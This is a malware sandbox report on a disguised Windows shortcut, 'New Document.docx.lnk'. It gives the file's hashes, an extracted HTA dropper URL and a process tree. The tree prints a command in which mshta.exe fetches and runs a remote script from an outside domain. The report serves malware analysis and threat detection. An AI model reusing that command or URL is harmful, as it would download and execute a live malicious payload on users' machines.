Overview

overview

10

Static

static

1

Data/New D...cx.lnk

windows7-x64

10

Data/New D...cx.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    01-03-2023 16:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Data/New Document.docx.lnk

  • Size

    548KB

  • MD5

    1a1c8c0f5cafb7df661086bcb804154c

  • SHA1

    3b0f3682f9407bf0e0f8c80c42d5b5eb07f3e009

  • SHA256

    06daafd4c09594d660c2191b4a421564b492a7043e4db4e91827fbc732d068a8

  • SHA512

    c12904f4fa9ae06f0be15296c65fa4496153555e0d7543a944646661b009450ed9cf0bbe3c0aaf86f514514990ee108037ec976f7dd371bd998609c02075ed8a

  • SSDEEP

    12288:U91M3doO2I7h0nGYeLfT9wgeRNLgEP2X9BGFsqmXxI:uMC67h0n92X9BGSqGxI

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://hpuniversity.in/files/data/start

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Data\New Document.docx.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://hpuniversity.in/files/data/start && mshta.exe
      2⤵
      • Modifies Internet Explorer settings
      PID:1200

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads